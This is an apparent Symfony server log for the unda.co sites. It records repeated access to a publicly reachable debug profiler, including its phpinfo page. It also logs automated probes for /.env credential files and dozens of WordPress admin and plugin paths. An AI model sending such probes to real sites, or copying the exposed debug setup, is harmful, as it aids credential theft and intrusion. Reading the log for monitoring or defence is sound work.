[2025-12-19 01:52:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=request","method":"GET"} []
[2025-12-19 01:52:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 01:54:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=exception","method":"GET"} []
[2025-12-19 01:54:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 01:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=cache","method":"GET"} []
[2025-12-19 01:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 01:58:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ad59","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/00ad59?panel=time","method":"GET"} []
[2025-12-19 01:58:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 01:59:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"497d02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/497d02?panel=validator","method":"GET"} []
[2025-12-19 01:59:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 02:02:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:07:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc","method":"GET"} []
[2025-12-19 02:07:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 02:08:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ba01a","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4ba01a?panel=config","method":"GET"} []
[2025-12-19 02:08:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 02:10:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=form","method":"GET"} []
[2025-12-19 02:10:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 02:12:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=time","method":"GET"} []
[2025-12-19 02:12:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 02:13:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:13:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 02:15:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f721d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5f721d?panel=time","method":"GET"} []
[2025-12-19 02:15:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 02:17:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=twig","method":"GET"} []
[2025-12-19 02:17:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 02:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
[2025-12-19 02:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 02:21:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 02:21:26] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a70931","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/a70931","method":"GET"} []
[2025-12-19 02:23:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
[2025-12-19 02:23:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-19 02:25:14] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 02:26:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://auth.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://auth.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:26:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=time","method":"GET"} []
[2025-12-19 02:26:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 02:30:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-19 02:36:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=security","method":"GET"} []
[2025-12-19 02:36:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 02:37:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-19 02:37:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-19 02:40:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=db","method":"GET"} []
[2025-12-19 02:40:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 02:40:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:40:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:40:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:40:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:40:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 02:41:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"599e8a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/599e8a?panel=form","method":"GET"} []
[2025-12-19 02:41:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 02:43:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1bbb51","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1bbb51","method":"GET"} []
[2025-12-19 02:43:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 02:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
